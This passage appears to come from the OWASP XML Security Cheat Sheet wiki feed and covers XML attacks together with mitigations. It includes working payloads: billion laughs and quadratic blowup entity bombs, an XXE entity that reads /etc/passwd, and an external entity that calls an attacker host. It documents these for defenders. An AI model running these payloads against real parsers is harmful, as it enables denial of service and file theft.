The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must use a schema with strong data types for each value, defining properly nested structures with specific arrangements and numbers of items. The content of each attribute and element should be properly analyzed to contain valid values before being stored or processed. &lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE TAG [&lt;br /&gt;
     &amp;lt;!ENTITY FILE  SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TAG&amp;gt;&amp;amp;FILE;&amp;lt;/TAG&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Check the document size prior to parsing its contents, and use an XML schema to validate the document structure. &lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid the schema poisoning attack, you must use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
&amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
&amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt; ]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
  &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(A 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(A 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
RFC 2376 states that &amp;quot;Recursive expansions are prohibited [REC-XML] and XML processors are required to detect them&amp;quot;. To detect this type of behavior automatically, you must limit the number of expansions to be made, or disable the use of inline DTD schemas altogether in your XML parsing objects.  SOAP messages should be inherently safe from this vulnerability because “a SOAP message MUST NOT contain a document type declaration,”  but when this type of vulnerability was detected, certain implementations did not comply with this rule. &lt;br /&gt;
&lt;br /&gt;
=== File Retrieval ===&lt;br /&gt;
Consider the following example code of an XEE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE includeme [&lt;br /&gt;
   &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
 &amp;lt;includeme&amp;gt;&amp;amp;xxe;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid a file retrieval attack, avoid using DTD and validate the content of XML documents according to the expected values of a local XML schema.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XEE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External File Retrieval ====&lt;br /&gt;
Whenever there is an XEE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, do not use DTD.&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224412</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224412"/>
				<updated>2016-12-21T17:06:57Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software. &lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
